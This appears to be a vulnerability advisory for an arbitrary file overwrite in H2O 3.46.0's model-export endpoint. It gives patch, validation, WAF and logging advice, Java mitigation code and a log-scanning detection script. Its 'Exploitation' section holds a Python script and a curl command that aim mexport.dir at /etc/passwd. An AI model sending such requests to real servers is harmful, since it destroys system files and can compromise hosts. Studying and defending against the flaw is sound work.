How the CVE Works:
In H2O version 3.46.0, the `/99/Models/{name}/json` endpoint is vulnerable to arbitrary file overwrite due to improper handling of user-supplied input. The vulnerability originates in the `exportModelDetails` function within ModelsHandler.java. The `mexport.dir` parameter, which is user-controllable, is used to define the file path where model details are written. Without proper validation or sanitization, an attacker can manipulate this parameter to specify arbitrary file paths on the server. This allows them to overwrite critical system files, potentially leading to a complete compromise of the server.
DailyCVE Form:
Platform: H2O
Version: 3.46.0
Vulnerability: Arbitrary File Overwrite
Severity: High
Date: Mar 20, 2025
What Undercode Say:
Exploitation:
1. Exploit Code (Python):
import requests

target_url = "http://target-server:54321/99/Models/malicious/json"
payload = {
    "mexport.dir": "/etc/passwd",
    "model_details": "malicious_content"
}
response = requests.post(target_url, json=payload)
print(response.status_code, response.text)
2. Exploit Command (cURL):
curl -X POST http://target-server:54321/99/Models/malicious/json -H "Content-Type: application/json" -d '{"mexport.dir":"/etc/passwd", "model_details":"malicious_content"}'
Protection:
1. Patch Application:
- Upgrade to H2O version 3.46.1 or later, where the `mexport.dir` parameter is properly sanitized.
2. Input Validation:
- Implement strict input validation to ensure user-supplied paths are within a safe directory.
3. Web Application Firewall (WAF):
- Deploy a WAF to block malicious payloads targeting the `/99/Models/{name}/json` endpoint.
4. File Permissions:
- Restrict file permissions to prevent overwriting critical system files.
5. Log Monitoring:
- Monitor logs for unusual activity on the `/99/Models/{name}/json` endpoint.
Analytics:
- Attack Vector: Remote
- Complexity: Low
- Privileges Required: None
- User Interaction: None
- Impact: High (File overwrite, system compromise)
Mitigation Code (Java):
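// Sanitize user input in ModelsHandler.java
// Requires: import java.nio.file.Path; import java.nio.file.Paths;
public void exportModelDetails(String mexportDir, String modelDetails) {
    // Normalize before comparing so "../" segments cannot escape the allowed directory;
    // a plain String.startsWith check would accept "/safe/directory/../../etc".
    Path base = Paths.get("/safe/directory").toAbsolutePath().normalize();
    Path target = Paths.get(mexportDir).toAbsolutePath().normalize();
    if (!target.startsWith(base)) {
        throw new SecurityException("Invalid directory path");
    }
    // Proceed with file writing
}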
Detection Command:
grep -r "mexport.dir" /path/to/h2o/logs
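The grep above only shows that the parameter was used. As an added example (not part of the original post or of H2O), the following script flags only those requests to `/99/Models/{name}/json` whose `mexport.dir` value resolves outside an expected export directory, including percent-encoded values. The access-log format, the sample lines, the presence of the parameter in the logged query string and the `/srv/h2o/exports` directory are all assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the only directory model exports are expected to be written to.
ALLOWED_EXPORT_ROOT = "/srv/h2o/exports"

ENDPOINT = re.compile(r"^/99/Models/[^/]+/json$")
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines in an assumed access-log format (not real H2O output).
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Mar/2025:10:01:02 +0000] "GET /3/Models HTTP/1.1" 200 512',
    '10.0.0.5 - - [20/Mar/2025:10:01:09 +0000] "POST /99/Models/gbm_1/json'
    '?mexport.dir=/srv/h2o/exports/gbm_1 HTTP/1.1" 200 64',
    '10.0.0.9 - - [20/Mar/2025:10:04:31 +0000] "POST /99/Models/gbm_1/json'
    '?mexport.dir=%2Fsrv%2Fh2o%2Fexports%2F..%2F..%2F..%2Ftmp%2Fconstructed.json HTTP/1.1" 200 64',
    '10.0.0.9 - - [20/Mar/2025:10:04:40 +0000] "POST /99/Models/gbm_1/json'
    '?mexport.dir=/tmp/constructed-outside.json HTTP/1.1" 200 64',
]

def is_inside(root, candidate):
    """True if candidate, after collapsing '.' and '..', stays under root."""
    root = posixpath.normpath(root)
    # Assumption: relative values resolve against root; absolute values replace it.
    resolved = posixpath.normpath(posixpath.join(root, candidate))
    return resolved == root or resolved.startswith(root + "/")

def suspicious_exports(lines, root=ALLOWED_EXPORT_ROOT):
    """Return (line_number, decoded mexport.dir) for exports that leave root."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not ENDPOINT.match(url.path):
            continue
        # parse_qs percent-decodes, so %2F and %2E variants are compared decoded.
        for value in parse_qs(url.query).get("mexport.dir", []):
            if not is_inside(root, value):
                findings.append((lineno, value))
    return findings

if __name__ == "__main__":
    for lineno, value in suspicious_exports(SAMPLE_LOG):
        print(f"line {lineno}: mexport.dir outside {ALLOWED_EXPORT_ROOT}: {value}")
```

If the parameter is sent in the request body, as in the JSON requests shown earlier, the same check has to run where bodies are visible (a reverse proxy or WAF log), since a plain access log will not contain it.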
Summary:
This CVE highlights the importance of input validation and secure coding practices. Immediate patching and monitoring are recommended to mitigate risks.
References:
Reported By: https://github.com/advisories/GHSA-g48v-3p35-88jr
Extra Source Hub:
Undercode